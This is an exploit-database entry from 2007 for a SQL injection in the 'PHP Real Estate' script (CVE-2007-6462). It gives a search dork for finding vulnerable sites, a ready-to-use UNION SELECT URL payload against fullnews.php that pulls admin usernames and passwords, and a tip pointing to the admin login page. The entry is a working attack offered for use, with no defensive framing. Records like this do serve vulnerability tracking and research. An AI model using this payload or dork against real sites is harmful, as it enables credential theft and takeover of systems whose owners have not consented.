PHP Real Estate - 'fullnews.php?id' SQL Injection
Author: t0pP8uZz
type: webapps
platform: php
port:
date_added: 2007-12-13
date_updated:
verified: 1
codes: OSVDB-39229;CVE-2007-6462
tags:
aliases:
screenshot_url:
application_url:
--==+================================================================================+==--
--==+ PHP Real Estate SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--
AUTHOR: t0pP8uZz & xprog
SITE: http://phprealestatescript.com
DORK: "Browse with Interactive Map"
DESCRIPTION:
pull admin info from database
EXPLOITS:
www.site.com/fullnews.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,char(58),password),4,5/**/FROM/**/admin/*
NOTE/TIP:
admin login is at /admin/
GREETZ: milw0rm.com, h4ck-y0u.org !
--==+================================================================================+==--
--==+ PHP Real Estate SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--
# milw0rm.com [2007-12-14]